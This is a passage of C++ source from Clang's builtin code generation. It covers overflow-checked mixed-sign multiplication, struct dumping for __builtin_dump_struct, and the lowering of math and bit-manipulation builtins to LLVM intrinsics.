if (SignedOpWidth < UnsignedOpWidth)
Signed = CGF.Builder.CreateSExt(Signed, Unsigned->getType(), "op.sext");
if (UnsignedOpWidth < SignedOpWidth)
Unsigned = CGF.Builder.CreateZExt(Unsigned, Signed->getType(), "op.zext");
llvm::Type *OpTy = Signed->getType();
llvm::Value *Zero = llvm::Constant::getNullValue(OpTy);
Address ResultPtr = CGF.EmitPointerWithAlignment(ResultArg);
llvm::Type *ResTy = ResultPtr.getElementType();
unsigned OpWidth = std::max(Op1Info.Width, Op2Info.Width);
// Take the absolute value of the signed operand.
llvm::Value *IsNegative = CGF.Builder.CreateICmpSLT(Signed, Zero);
llvm::Value *AbsOfNegative = CGF.Builder.CreateSub(Zero, Signed);
llvm::Value *AbsSigned =
CGF.Builder.CreateSelect(IsNegative, AbsOfNegative, Signed);
// Perform a checked unsigned multiplication.
llvm::Value *UnsignedOverflow;
llvm::Value *UnsignedResult =
EmitOverflowIntrinsic(CGF, llvm::Intrinsic::umul_with_overflow, AbsSigned,
Unsigned, UnsignedOverflow);
llvm::Value *Overflow, *Result;
if (ResultInfo.Signed) {
// Signed overflow occurs if the result is greater than INT_MAX or lesser
// than INT_MIN, i.e when |Result| > (INT_MAX + IsNegative).
auto IntMax =
llvm::APInt::getSignedMaxValue(ResultInfo.Width).zextOrSelf(OpWidth);
llvm::Value *MaxResult =
CGF.Builder.CreateAdd(llvm::ConstantInt::get(OpTy, IntMax),
CGF.Builder.CreateZExt(IsNegative, OpTy));
llvm::Value *SignedOverflow =
CGF.Builder.CreateICmpUGT(UnsignedResult, MaxResult);
Overflow = CGF.Builder.CreateOr(UnsignedOverflow, SignedOverflow);
// Prepare the signed result (possibly by negating it).
llvm::Value *NegativeResult = CGF.Builder.CreateNeg(UnsignedResult);
llvm::Value *SignedResult =
CGF.Builder.CreateSelect(IsNegative, NegativeResult, UnsignedResult);
Result = CGF.Builder.CreateTrunc(SignedResult, ResTy);
} else {
// Unsigned overflow occurs if the result is < 0 or greater than UINT_MAX.
llvm::Value *Underflow = CGF.Builder.CreateAnd(
IsNegative, CGF.Builder.CreateIsNotNull(UnsignedResult));
Overflow = CGF.Builder.CreateOr(UnsignedOverflow, Underflow);
if (ResultInfo.Width < OpWidth) {
auto IntMax =
llvm::APInt::getMaxValue(ResultInfo.Width).zext(OpWidth);
llvm::Value *TruncOverflow = CGF.Builder.CreateICmpUGT(
UnsignedResult, llvm::ConstantInt::get(OpTy, IntMax));
Overflow = CGF.Builder.CreateOr(Overflow, TruncOverflow);
}
// Negate the product if it would be negative in infinite precision.
Result = CGF.Builder.CreateSelect(
IsNegative, CGF.Builder.CreateNeg(UnsignedResult), UnsignedResult);
Result = CGF.Builder.CreateTrunc(Result, ResTy);
}
assert(Overflow && Result && "Missing overflow or result");
bool isVolatile =
ResultArg->getType()->getPointeeType().isVolatileQualified();
CGF.Builder.CreateStore(CGF.EmitToMemory(Result, ResultQTy), ResultPtr,
isVolatile);
return RValue::get(Overflow);
}
static llvm::Value *dumpRecord(CodeGenFunction &CGF, QualType RType,
Value *&RecordPtr, CharUnits Align,
llvm::FunctionCallee Func, int Lvl) {
ASTContext &Context = CGF.getContext();
RecordDecl *RD = RType->castAs<RecordType>()->getDecl()->getDefinition();
std::string Pad = std::string(Lvl * 4, ' ');
Value *GString =
CGF.Builder.CreateGlobalStringPtr(RType.getAsString() + " {\n");
Value *Res = CGF.Builder.CreateCall(Func, {GString});
static llvm::DenseMap<QualType, const char *> Types;
if (Types.empty()) {
Types[Context.CharTy] = "%c";
Types[Context.BoolTy] = "%d";
Types[Context.SignedCharTy] = "%hhd";
Types[Context.UnsignedCharTy] = "%hhu";
Types[Context.IntTy] = "%d";
Types[Context.UnsignedIntTy] = "%u";
Types[Context.LongTy] = "%ld";
Types[Context.UnsignedLongTy] = "%lu";
Types[Context.LongLongTy] = "%lld";
Types[Context.UnsignedLongLongTy] = "%llu";
Types[Context.ShortTy] = "%hd";
Types[Context.UnsignedShortTy] = "%hu";
Types[Context.VoidPtrTy] = "%p";
Types[Context.FloatTy] = "%f";
Types[Context.DoubleTy] = "%f";
Types[Context.LongDoubleTy] = "%Lf";
Types[Context.getPointerType(Context.CharTy)] = "%s";
Types[Context.getPointerType(Context.getConstType(Context.CharTy))] = "%s";
}
for (const auto *FD : RD->fields()) {
Value *FieldPtr = RecordPtr;
if (RD->isUnion())
FieldPtr = CGF.Builder.CreatePointerCast(
FieldPtr, CGF.ConvertType(Context.getPointerType(FD->getType())));
else
FieldPtr = CGF.Builder.CreateStructGEP(CGF.ConvertType(RType), FieldPtr,
FD->getFieldIndex());
GString = CGF.Builder.CreateGlobalStringPtr(
llvm::Twine(Pad)
.concat(FD->getType().getAsString())
.concat(llvm::Twine(' '))
.concat(FD->getNameAsString())
.concat(" : ")
.str());
Value *TmpRes = CGF.Builder.CreateCall(Func, {GString});
Res = CGF.Builder.CreateAdd(Res, TmpRes);
QualType CanonicalType =
FD->getType().getUnqualifiedType().getCanonicalType();
// We check whether we are in a recursive type
if (CanonicalType->isRecordType()) {
TmpRes = dumpRecord(CGF, CanonicalType, FieldPtr, Align, Func, Lvl + 1);
Res = CGF.Builder.CreateAdd(TmpRes, Res);
continue;
}
// We try to determine the best format to print the current field
llvm::Twine Format = Types.find(CanonicalType) == Types.end()
? Types[Context.VoidPtrTy]
: Types[CanonicalType];
Address FieldAddress = Address(FieldPtr, Align);
FieldPtr = CGF.Builder.CreateLoad(FieldAddress);
// FIXME Need to handle bitfield here
GString = CGF.Builder.CreateGlobalStringPtr(
Format.concat(llvm::Twine('\n')).str());
TmpRes = CGF.Builder.CreateCall(Func, {GString, FieldPtr});
Res = CGF.Builder.CreateAdd(Res, TmpRes);
}
GString = CGF.Builder.CreateGlobalStringPtr(Pad + "}\n");
Value *TmpRes = CGF.Builder.CreateCall(Func, {GString});
Res = CGF.Builder.CreateAdd(Res, TmpRes);
return Res;
}
static bool
TypeRequiresBuiltinLaunderImp(const ASTContext &Ctx, QualType Ty,
llvm::SmallPtrSetImpl<const Decl *> &Seen) {
if (const auto *Arr = Ctx.getAsArrayType(Ty))
Ty = Ctx.getBaseElementType(Arr);
const auto *Record = Ty->getAsCXXRecordDecl();
if (!Record)
return false;
// We've already checked this type, or are in the process of checking it.
if (!Seen.insert(Record).second)
return false;
assert(Record->hasDefinition() &&
"Incomplete types should already be diagnosed");
if (Record->isDynamicClass())
return true;
for (FieldDecl *F : Record->fields()) {
if (TypeRequiresBuiltinLaunderImp(Ctx, F->getType(), Seen))
return true;
}
return false;
}
/// Determine if the specified type requires laundering by checking if it is a
/// dynamic class type or contains a subobject which is a dynamic class type.
static bool TypeRequiresBuiltinLaunder(CodeGenModule &CGM, QualType Ty) {
if (!CGM.getCodeGenOpts().StrictVTablePointers)
return false;
llvm::SmallPtrSet<const Decl *, 16> Seen;
return TypeRequiresBuiltinLaunderImp(CGM.getContext(), Ty, Seen);
}
RValue CodeGenFunction::emitRotate(const CallExpr *E, bool IsRotateRight) {
llvm::Value *Src = EmitScalarExpr(E->getArg(0));
llvm::Value *ShiftAmt = EmitScalarExpr(E->getArg(1));
// The builtin's shift arg may have a different type than the source arg and
// result, but the LLVM intrinsic uses the same type for all values.
llvm::Type *Ty = Src->getType();
ShiftAmt = Builder.CreateIntCast(ShiftAmt, Ty, false);
// Rotate is a special case of LLVM funnel shift - 1st 2 args are the same.
unsigned IID = IsRotateRight ? Intrinsic::fshr : Intrinsic::fshl;
Function *F = CGM.getIntrinsic(IID, Ty);
return RValue::get(Builder.CreateCall(F, { Src, Src, ShiftAmt }));
}
// Map math builtins for long-double to f128 version.
static unsigned mutateLongDoubleBuiltin(unsigned BuiltinID) {
switch (BuiltinID) {
#define MUTATE_LDBL(func) \
case Builtin::BI__builtin_##func##l: \
return Builtin::BI__builtin_##func##f128;
MUTATE_LDBL(sqrt)
MUTATE_LDBL(cbrt)
MUTATE_LDBL(fabs)
MUTATE_LDBL(log)
MUTATE_LDBL(log2)
MUTATE_LDBL(log10)
MUTATE_LDBL(log1p)
MUTATE_LDBL(logb)
MUTATE_LDBL(exp)
MUTATE_LDBL(exp2)
MUTATE_LDBL(expm1)
MUTATE_LDBL(fdim)
MUTATE_LDBL(hypot)
MUTATE_LDBL(ilogb)
MUTATE_LDBL(pow)
MUTATE_LDBL(fmin)
MUTATE_LDBL(fmax)
MUTATE_LDBL(ceil)
MUTATE_LDBL(trunc)
MUTATE_LDBL(rint)
MUTATE_LDBL(nearbyint)
MUTATE_LDBL(round)
MUTATE_LDBL(floor)
MUTATE_LDBL(lround)
MUTATE_LDBL(llround)
MUTATE_LDBL(lrint)
MUTATE_LDBL(llrint)
MUTATE_LDBL(fmod)
MUTATE_LDBL(modf)
MUTATE_LDBL(nan)
MUTATE_LDBL(nans)
MUTATE_LDBL(inf)
MUTATE_LDBL(fma)
MUTATE_LDBL(sin)
MUTATE_LDBL(cos)
MUTATE_LDBL(tan)
MUTATE_LDBL(sinh)
MUTATE_LDBL(cosh)
MUTATE_LDBL(tanh)
MUTATE_LDBL(asin)
MUTATE_LDBL(acos)
MUTATE_LDBL(atan)
MUTATE_LDBL(asinh)
MUTATE_LDBL(acosh)
MUTATE_LDBL(atanh)
MUTATE_LDBL(atan2)
MUTATE_LDBL(erf)
MUTATE_LDBL(erfc)
MUTATE_LDBL(ldexp)
MUTATE_LDBL(frexp)
MUTATE_LDBL(huge_val)
MUTATE_LDBL(copysign)
MUTATE_LDBL(nextafter)
MUTATE_LDBL(nexttoward)
MUTATE_LDBL(remainder)
MUTATE_LDBL(remquo)
MUTATE_LDBL(scalbln)
MUTATE_LDBL(scalbn)
MUTATE_LDBL(tgamma)
MUTATE_LDBL(lgamma)
#undef MUTATE_LDBL
default:
return BuiltinID;
}
}
RValue CodeGenFunction::EmitBuiltinExpr(const GlobalDecl GD, unsigned BuiltinID,
const CallExpr *E,
ReturnValueSlot ReturnValue) {
const FunctionDecl *FD = GD.getDecl()->getAsFunction();
// See if we can constant fold this builtin. If so, don't emit it at all.
Expr::EvalResult Result;
if (E->EvaluateAsRValue(Result, CGM.getContext()) &&
!Result.hasSideEffects()) {
if (Result.Val.isInt())
return RValue::get(llvm::ConstantInt::get(getLLVMContext(),
Result.Val.getInt()));
if (Result.Val.isFloat())
return RValue::get(llvm::ConstantFP::get(getLLVMContext(),
Result.Val.getFloat()));
}
// If current long-double semantics is IEEE 128-bit, replace math builtins
// of long-double with f128 equivalent.
// TODO: This mutation should also be applied to other targets other than PPC,
// after backend supports IEEE 128-bit style libcalls.
if (getTarget().getTriple().isPPC64() &&
&getTarget().getLongDoubleFormat() == &llvm::APFloat::IEEEquad())
BuiltinID = mutateLongDoubleBuiltin(BuiltinID);
// If the builtin has been declared explicitly with an assembler label,
// disable the specialized emitting below. Ideally we should communicate the
// rename in IR, or at least avoid generating the intrinsic calls that are
// likely to get lowered to the renamed library functions.
const unsigned BuiltinIDIfNoAsmLabel =
FD->hasAttr<AsmLabelAttr>() ? 0 : BuiltinID;
// There are LLVM math intrinsics/instructions corresponding to math library
// functions except the LLVM op will never set errno while the math library
// might. Also, math builtins have the same semantics as their math library
// twins. Thus, we can transform math library and builtin calls to their
// LLVM counterparts if the call is marked 'const' (known to never set errno).
if (FD->hasAttr<ConstAttr>()) {
switch (BuiltinIDIfNoAsmLabel) {
case Builtin::BIceil:
case Builtin::BIceilf:
case Builtin::BIceill:
case Builtin::BI__builtin_ceil:
case Builtin::BI__builtin_ceilf:
case Builtin::BI__builtin_ceilf16:
case Builtin::BI__builtin_ceill:
case Builtin::BI__builtin_ceilf128:
return RValue::get(emitUnaryMaybeConstrainedFPBuiltin(*this, E,
Intrinsic::ceil,
Intrinsic::experimental_constrained_ceil));
case Builtin::BIcopysign:
case Builtin::BIcopysignf:
case Builtin::BIcopysignl:
case Builtin::BI__builtin_copysign:
case Builtin::BI__builtin_copysignf:
case Builtin::BI__builtin_copysignf16:
case Builtin::BI__builtin_copysignl:
case Builtin::BI__builtin_copysignf128:
return RValue::get(emitBinaryBuiltin(*this, E, Intrinsic::copysign));
case Builtin::BIcos:
case Builtin::BIcosf:
case Builtin::BIcosl:
case Builtin::BI__builtin_cos:
case Builtin::BI__builtin_cosf:
case Builtin::BI__builtin_cosf16:
case Builtin::BI__builtin_cosl:
case Builtin::BI__builtin_cosf128:
return RValue::get(emitUnaryMaybeConstrainedFPBuiltin(*this, E,
Intrinsic::cos,
Intrinsic::experimental_constrained_cos));
case Builtin::BIexp:
case Builtin::BIexpf:
case Builtin::BIexpl:
case Builtin::BI__builtin_exp:
case Builtin::BI__builtin_expf:
case Builtin::BI__builtin_expf16:
case Builtin::BI__builtin_expl:
case Builtin::BI__builtin_expf128:
return RValue::get(emitUnaryMaybeConstrainedFPBuiltin(*this, E,
Intrinsic::exp,
Intrinsic::experimental_constrained_exp));
case Builtin::BIexp2:
case Builtin::BIexp2f:
case Builtin::BIexp2l:
case Builtin::BI__builtin_exp2:
case Builtin::BI__builtin_exp2f:
case Builtin::BI__builtin_exp2f16:
case Builtin::BI__builtin_exp2l:
case Builtin::BI__builtin_exp2f128:
return RValue::get(emitUnaryMaybeConstrainedFPBuiltin(*this, E,
Intrinsic::exp2,
Intrinsic::experimental_constrained_exp2));
case Builtin::BIfabs:
case Builtin::BIfabsf:
case Builtin::BIfabsl:
case Builtin::BI__builtin_fabs:
case Builtin::BI__builtin_fabsf:
case Builtin::BI__builtin_fabsf16:
case Builtin::BI__builtin_fabsl:
case Builtin::BI__builtin_fabsf128:
return RValue::get(emitUnaryBuiltin(*this, E, Intrinsic::fabs));
case Builtin::BIfloor:
case Builtin::BIfloorf:
case Builtin::BIfloorl:
case Builtin::BI__builtin_floor:
case Builtin::BI__builtin_floorf:
case Builtin::BI__builtin_floorf16:
case Builtin::BI__builtin_floorl:
case Builtin::BI__builtin_floorf128:
return RValue::get(emitUnaryMaybeConstrainedFPBuiltin(*this, E,
Intrinsic::floor,
Intrinsic::experimental_constrained_floor));
case Builtin::BIfma:
case Builtin::BIfmaf:
case Builtin::BIfmal:
case Builtin::BI__builtin_fma:
case Builtin::BI__builtin_fmaf:
case Builtin::BI__builtin_fmaf16:
case Builtin::BI__builtin_fmal:
case Builtin::BI__builtin_fmaf128:
return RValue::get(emitTernaryMaybeConstrainedFPBuiltin(*this, E,
Intrinsic::fma,
Intrinsic::experimental_constrained_fma));
case Builtin::BIfmax:
case Builtin::BIfmaxf:
case Builtin::BIfmaxl:
case Builtin::BI__builtin_fmax:
case Builtin::BI__builtin_fmaxf:
case Builtin::BI__builtin_fmaxf16:
case Builtin::BI__builtin_fmaxl:
case Builtin::BI__builtin_fmaxf128:
return RValue::get(emitBinaryMaybeConstrainedFPBuiltin(*this, E,
Intrinsic::maxnum,
Intrinsic::experimental_constrained_maxnum));
case Builtin::BIfmin:
case Builtin::BIfminf:
case Builtin::BIfminl:
case Builtin::BI__builtin_fmin:
case Builtin::BI__builtin_fminf:
case Builtin::BI__builtin_fminf16:
case Builtin::BI__builtin_fminl:
case Builtin::BI__builtin_fminf128:
return RValue::get(emitBinaryMaybeConstrainedFPBuiltin(*this, E,
Intrinsic::minnum,
Intrinsic::experimental_constrained_minnum));
// fmod() is a special-case. It maps to the frem instruction rather than an
// LLVM intrinsic.
case Builtin::BIfmod:
case Builtin::BIfmodf:
case Builtin::BIfmodl:
case Builtin::BI__builtin_fmod:
case Builtin::BI__builtin_fmodf:
case Builtin::BI__builtin_fmodf16:
case Builtin::BI__builtin_fmodl:
case Builtin::BI__builtin_fmodf128: {
CodeGenFunction::CGFPOptionsRAII FPOptsRAII(*this, E);
Value *Arg1 = EmitScalarExpr(E->getArg(0));
Value *Arg2 = EmitScalarExpr(E->getArg(1));
return RValue::get(Builder.CreateFRem(Arg1, Arg2, "fmod"));
}
case Builtin::BIlog:
case Builtin::BIlogf:
case Builtin::BIlogl:
case Builtin::BI__builtin_log:
case Builtin::BI__builtin_logf:
case Builtin::BI__builtin_logf16:
case Builtin::BI__builtin_logl:
case Builtin::BI__builtin_logf128:
return RValue::get(emitUnaryMaybeConstrainedFPBuiltin(*this, E,
Intrinsic::log,
Intrinsic::experimental_constrained_log));
case Builtin::BIlog10:
case Builtin::BIlog10f:
case Builtin::BIlog10l:
case Builtin::BI__builtin_log10:
case Builtin::BI__builtin_log10f:
case Builtin::BI__builtin_log10f16:
case Builtin::BI__builtin_log10l:
case Builtin::BI__builtin_log10f128:
return RValue::get(emitUnaryMaybeConstrainedFPBuiltin(*this, E,
Intrinsic::log10,
Intrinsic::experimental_constrained_log10));
case Builtin::BIlog2:
case Builtin::BIlog2f:
case Builtin::BIlog2l:
case Builtin::BI__builtin_log2:
case Builtin::BI__builtin_log2f:
case Builtin::BI__builtin_log2f16:
case Builtin::BI__builtin_log2l:
case Builtin::BI__builtin_log2f128:
return RValue::get(emitUnaryMaybeConstrainedFPBuiltin(*this, E,
Intrinsic::log2,
Intrinsic::experimental_constrained_log2));
case Builtin::BInearbyint:
case Builtin::BInearbyintf:
case Builtin::BInearbyintl:
case Builtin::BI__builtin_nearbyint:
case Builtin::BI__builtin_nearbyintf:
case Builtin::BI__builtin_nearbyintl:
case Builtin::BI__builtin_nearbyintf128:
return RValue::get(emitUnaryMaybeConstrainedFPBuiltin(*this, E,
Intrinsic::nearbyint,
Intrinsic::experimental_constrained_nearbyint));
case Builtin::BIpow:
case Builtin::BIpowf:
case Builtin::BIpowl:
case Builtin::BI__builtin_pow:
case Builtin::BI__builtin_powf:
case Builtin::BI__builtin_powf16:
case Builtin::BI__builtin_powl:
case Builtin::BI__builtin_powf128:
return RValue::get(emitBinaryMaybeConstrainedFPBuiltin(*this, E,
Intrinsic::pow,
Intrinsic::experimental_constrained_pow));
case Builtin::BIrint:
case Builtin::BIrintf:
case Builtin::BIrintl:
case Builtin::BI__builtin_rint:
case Builtin::BI__builtin_rintf:
case Builtin::BI__builtin_rintf16:
case Builtin::BI__builtin_rintl:
case Builtin::BI__builtin_rintf128:
return RValue::get(emitUnaryMaybeConstrainedFPBuiltin(*this, E,
Intrinsic::rint,
Intrinsic::experimental_constrained_rint));
case Builtin::BIround:
case Builtin::BIroundf:
case Builtin::BIroundl:
case Builtin::BI__builtin_round:
case Builtin::BI__builtin_roundf:
case Builtin::BI__builtin_roundf16:
case Builtin::BI__builtin_roundl:
case Builtin::BI__builtin_roundf128:
return RValue::get(emitUnaryMaybeConstrainedFPBuiltin(*this, E,
Intrinsic::round,
Intrinsic::experimental_constrained_round));
case Builtin::BIsin:
case Builtin::BIsinf:
case Builtin::BIsinl:
case Builtin::BI__builtin_sin:
case Builtin::BI__builtin_sinf:
case Builtin::BI__builtin_sinf16:
case Builtin::BI__builtin_sinl:
case Builtin::BI__builtin_sinf128:
return RValue::get(emitUnaryMaybeConstrainedFPBuiltin(*this, E,
Intrinsic::sin,
Intrinsic::experimental_constrained_sin));
case Builtin::BIsqrt:
case Builtin::BIsqrtf:
case Builtin::BIsqrtl:
case Builtin::BI__builtin_sqrt:
case Builtin::BI__builtin_sqrtf:
case Builtin::BI__builtin_sqrtf16:
case Builtin::BI__builtin_sqrtl:
case Builtin::BI__builtin_sqrtf128:
return RValue::get(emitUnaryMaybeConstrainedFPBuiltin(*this, E,
Intrinsic::sqrt,
Intrinsic::experimental_constrained_sqrt));
case Builtin::BItrunc:
case Builtin::BItruncf:
case Builtin::BItruncl:
case Builtin::BI__builtin_trunc:
case Builtin::BI__builtin_truncf:
case Builtin::BI__builtin_truncf16:
case Builtin::BI__builtin_truncl:
case Builtin::BI__builtin_truncf128:
return RValue::get(emitUnaryMaybeConstrainedFPBuiltin(*this, E,
Intrinsic::trunc,
Intrinsic::experimental_constrained_trunc));
case Builtin::BIlround:
case Builtin::BIlroundf:
case Builtin::BIlroundl:
case Builtin::BI__builtin_lround:
case Builtin::BI__builtin_lroundf:
case Builtin::BI__builtin_lroundl:
case Builtin::BI__builtin_lroundf128:
return RValue::get(emitMaybeConstrainedFPToIntRoundBuiltin(
*this, E, Intrinsic::lround,
Intrinsic::experimental_constrained_lround));
case Builtin::BIllround:
case Builtin::BIllroundf:
case Builtin::BIllroundl:
case Builtin::BI__builtin_llround:
case Builtin::BI__builtin_llroundf:
case Builtin::BI__builtin_llroundl:
case Builtin::BI__builtin_llroundf128:
return RValue::get(emitMaybeConstrainedFPToIntRoundBuiltin(
*this, E, Intrinsic::llround,
Intrinsic::experimental_constrained_llround));
case Builtin::BIlrint:
case Builtin::BIlrintf:
case Builtin::BIlrintl:
case Builtin::BI__builtin_lrint:
case Builtin::BI__builtin_lrintf:
case Builtin::BI__builtin_lrintl:
case Builtin::BI__builtin_lrintf128:
return RValue::get(emitMaybeConstrainedFPToIntRoundBuiltin(
*this, E, Intrinsic::lrint,
Intrinsic::experimental_constrained_lrint));
case Builtin::BIllrint:
case Builtin::BIllrintf:
case Builtin::BIllrintl:
case Builtin::BI__builtin_llrint:
case Builtin::BI__builtin_llrintf:
case Builtin::BI__builtin_llrintl:
case Builtin::BI__builtin_llrintf128:
return RValue::get(emitMaybeConstrainedFPToIntRoundBuiltin(
*this, E, Intrinsic::llrint,
Intrinsic::experimental_constrained_llrint));
default:
break;
}
}
switch (BuiltinIDIfNoAsmLabel) {
default: break;
case Builtin::BI__builtin___CFStringMakeConstantString:
case Builtin::BI__builtin___NSStringMakeConstantString:
return RValue::get(ConstantEmitter(*this).emitAbstract(E, E->getType()));
case Builtin::BI__builtin_stdarg_start:
case Builtin::BI__builtin_va_start:
case Builtin::BI__va_start:
case Builtin::BI__builtin_va_end:
return RValue::get(
EmitVAStartEnd(BuiltinID == Builtin::BI__va_start
? EmitScalarExpr(E->getArg(0))
: EmitVAListRef(E->getArg(0)).getPointer(),
BuiltinID != Builtin::BI__builtin_va_end));
case Builtin::BI__builtin_va_copy: {
Value *DstPtr = EmitVAListRef(E->getArg(0)).getPointer();
Value *SrcPtr = EmitVAListRef(E->getArg(1)).getPointer();
llvm::Type *Type = Int8PtrTy;
DstPtr = Builder.CreateBitCast(DstPtr, Type);
SrcPtr = Builder.CreateBitCast(SrcPtr, Type);
return RValue::get(Builder.CreateCall(CGM.getIntrinsic(Intrinsic::vacopy),
{DstPtr, SrcPtr}));
}
case Builtin::BI__builtin_abs:
case Builtin::BI__builtin_labs:
case Builtin::BI__builtin_llabs: {
// X < 0 ? -X : X
// The negation has 'nsw' because abs of INT_MIN is undefined.
Value *ArgValue = EmitScalarExpr(E->getArg(0));
Value *NegOp = Builder.CreateNSWNeg(ArgValue, "neg");
Constant *Zero = llvm::Constant::getNullValue(ArgValue->getType());
Value *CmpResult = Builder.CreateICmpSLT(ArgValue, Zero, "abscond");
Value *Result = Builder.CreateSelect(CmpResult, NegOp, ArgValue, "abs");
return RValue::get(Result);
}
case Builtin::BI__builtin_complex: {
Value *Real = EmitScalarExpr(E->getArg(0));
Value *Imag = EmitScalarExpr(E->getArg(1));
return RValue::getComplex({Real, Imag});
}
case Builtin::BI__builtin_conj:
case Builtin::BI__builtin_conjf:
case Builtin::BI__builtin_conjl:
case Builtin::BIconj:
case Builtin::BIconjf:
case Builtin::BIconjl: {
ComplexPairTy ComplexVal = EmitComplexExpr(E->getArg(0));
Value *Real = ComplexVal.first;
Value *Imag = ComplexVal.second;
Imag = Builder.CreateFNeg(Imag, "neg");
return RValue::getComplex(std::make_pair(Real, Imag));
}
case Builtin::BI__builtin_creal:
case Builtin::BI__builtin_crealf:
case Builtin::BI__builtin_creall:
case Builtin::BIcreal:
case Builtin::BIcrealf:
case Builtin::BIcreall: {
ComplexPairTy ComplexVal = EmitComplexExpr(E->getArg(0));
return RValue::get(ComplexVal.first);
}
case Builtin::BI__builtin_dump_struct: {
llvm::Type *LLVMIntTy = getTypes().ConvertType(getContext().IntTy);
llvm::FunctionType *LLVMFuncType = llvm::FunctionType::get(
LLVMIntTy, {llvm::Type::getInt8PtrTy(getLLVMContext())}, true);
Value *Func = EmitScalarExpr(E->getArg(1)->IgnoreImpCasts());
CharUnits Arg0Align = EmitPointerWithAlignment(E->getArg(0)).getAlignment();
const Expr *Arg0 = E->getArg(0)->IgnoreImpCasts();
QualType Arg0Type = Arg0->getType()->getPointeeType();
Value *RecordPtr = EmitScalarExpr(Arg0);
Value *Res = dumpRecord(*this, Arg0Type, RecordPtr, Arg0Align,
{LLVMFuncType, Func}, 0);
return RValue::get(Res);
}
case Builtin::BI__builtin_preserve_access_index: {
// Only enabled preserved access index region when debuginfo
// is available as debuginfo is needed to preserve user-level
// access pattern.
if (!getDebugInfo()) {
CGM.Error(E->getExprLoc(), "using builtin_preserve_access_index() without -g");
return RValue::get(EmitScalarExpr(E->getArg(0)));
}
// Nested builtin_preserve_access_index() not supported
if (IsInPreservedAIRegion) {
CGM.Error(E->getExprLoc(), "nested builtin_preserve_access_index() not supported");
return RValue::get(EmitScalarExpr(E->getArg(0)));
}
IsInPreservedAIRegion = true;
Value *Res = EmitScalarExpr(E->getArg(0));
IsInPreservedAIRegion = false;
return RValue::get(Res);
}
case Builtin::BI__builtin_cimag:
case Builtin::BI__builtin_cimagf:
case Builtin::BI__builtin_cimagl:
case Builtin::BIcimag:
case Builtin::BIcimagf:
case Builtin::BIcimagl: {
ComplexPairTy ComplexVal = EmitComplexExpr(E->getArg(0));
return RValue::get(ComplexVal.second);
}
case Builtin::BI__builtin_clrsb:
case Builtin::BI__builtin_clrsbl:
case Builtin::BI__builtin_clrsbll: {
// clrsb(x) -> clz(x < 0 ? ~x : x) - 1 or
Value *ArgValue = EmitScalarExpr(E->getArg(0));
llvm::Type *ArgType = ArgValue->getType();
Function *F = CGM.getIntrinsic(Intrinsic::ctlz, ArgType);
llvm::Type *ResultType = ConvertType(E->getType());
Value *Zero = llvm::Constant::getNullValue(ArgType);
Value *IsNeg = Builder.CreateICmpSLT(ArgValue, Zero, "isneg");
Value *Inverse = Builder.CreateNot(ArgValue, "not");
Value *Tmp = Builder.CreateSelect(IsNeg, Inverse, ArgValue);
Value *Ctlz = Builder.CreateCall(F, {Tmp, Builder.getFalse()});
Value *Result = Builder.CreateSub(Ctlz, llvm::ConstantInt::get(ArgType, 1));
Result = Builder.CreateIntCast(Result, ResultType, /*isSigned*/true,
"cast");
return RValue::get(Result);
}
case Builtin::BI__builtin_ctzs:
case Builtin::BI__builtin_ctz:
case Builtin::BI__builtin_ctzl:
case Builtin::BI__builtin_ctzll: {
Value *ArgValue = EmitCheckedArgForBuiltin(E->getArg(0), BCK_CTZPassedZero);
llvm::Type *ArgType = ArgValue->getType();
Function *F = CGM.getIntrinsic(Intrinsic::cttz, ArgType);
llvm::Type *ResultType = ConvertType(E->getType());
Value *ZeroUndef = Builder.getInt1(getTarget().isCLZForZeroUndef());
Value *Result = Builder.CreateCall(F, {ArgValue, ZeroUndef});
if (Result->getType() != ResultType)
Result = Builder.CreateIntCast(Result, ResultType, /*isSigned*/true,
"cast");
return RValue::get(Result);
}
case Builtin::BI__builtin_clzs:
case Builtin::BI__builtin_clz:
case Builtin::BI__builtin_clzl:
case Builtin::BI__builtin_clzll: {
Value *ArgValue = EmitCheckedArgForBuiltin(E->getArg(0), BCK_CLZPassedZero);
llvm::Type *ArgType = ArgValue->getType();
Function *F = CGM.getIntrinsic(Intrinsic::ctlz, ArgType);
llvm::Type *ResultType = ConvertType(E->getType());
Value *ZeroUndef = Builder.getInt1(getTarget().isCLZForZeroUndef());
Value *Result = Builder.CreateCall(F, {ArgValue, ZeroUndef});
if (Result->getType() != ResultType)
Result = Builder.CreateIntCast(Result, ResultType, /*isSigned*/true,
"cast");
return RValue::get(Result);
}
case Builtin::BI__builtin_ffs:
case Builtin::BI__builtin_ffsl:
case Builtin::BI__builtin_ffsll: {
// ffs(x) -> x ? cttz(x) + 1 : 0
Value *ArgValue = EmitScalarExpr(E->getArg(0));
llvm::Type *ArgType = ArgValue->getType();
Function *F = CGM.getIntrinsic(Intrinsic::cttz, ArgType);
llvm::Type *ResultType = ConvertType(E->getType());
Value *Tmp =
Builder.CreateAdd(Builder.CreateCall(F, {ArgValue, Builder.getTrue()}),
llvm::ConstantInt::get(ArgType, 1));
Value *Zero = llvm::Constant::getNullValue(ArgType);
Value *IsZero = Builder.CreateICmpEQ(ArgValue, Zero, "iszero");
Value *Result = Builder.CreateSelect(IsZero, Zero, Tmp, "ffs");
if (Result->getType() != ResultType)
Result = Builder.CreateIntCast(Result, ResultType, /*isSigned*/true,
"cast");
return RValue::get(Result);
}
case Builtin::BI__builtin_parity:
case Builtin::BI__builtin_parityl:
case Builtin::BI__builtin_parityll: {
// parity(x) -> ctpop(x) & 1
Value *ArgValue = EmitScalarExpr(E->getArg(0));
llvm::Type *ArgType = ArgValue->getType();
Function *F = CGM.getIntrinsic(Intrinsic::ctpop, ArgType);
llvm::Type *ResultType = ConvertType(E->getType());
Value *Tmp = Builder.CreateCall(F, ArgValue);
Value *Result = Builder.CreateAnd(Tmp, llvm::ConstantInt::get(ArgType, 1));
if (Result->getType() != ResultType)
Result = Builder.CreateIntCast(Result, ResultType, /*isSigned*/true,
"cast");
return RValue::get(Result);
}
case Builtin::BI__lzcnt16:
case Builtin::BI__lzcnt:
case Builtin::BI__lzcnt64: {
Value *ArgValue = EmitScalarExpr(E->getArg(0));
llvm::Type *ArgType = ArgValue->getType();
Function *F = CGM.getIntrinsic(Intrinsic::ctlz, ArgType);
llvm::Type *ResultType = ConvertType(E->getType());
Value *Result = Builder.CreateCall(F, {ArgValue, Builder.getFalse()});
if (Result->getType() != ResultType)
Result = Builder.CreateIntCast(Result, ResultType, /*isSigned*/true,
"cast");
return RValue::get(Result);
}
case Builtin::BI__popcnt16:
case Builtin::BI__popcnt:
case Builtin::BI__popcnt64:
case Builtin::BI__builtin_popcount:
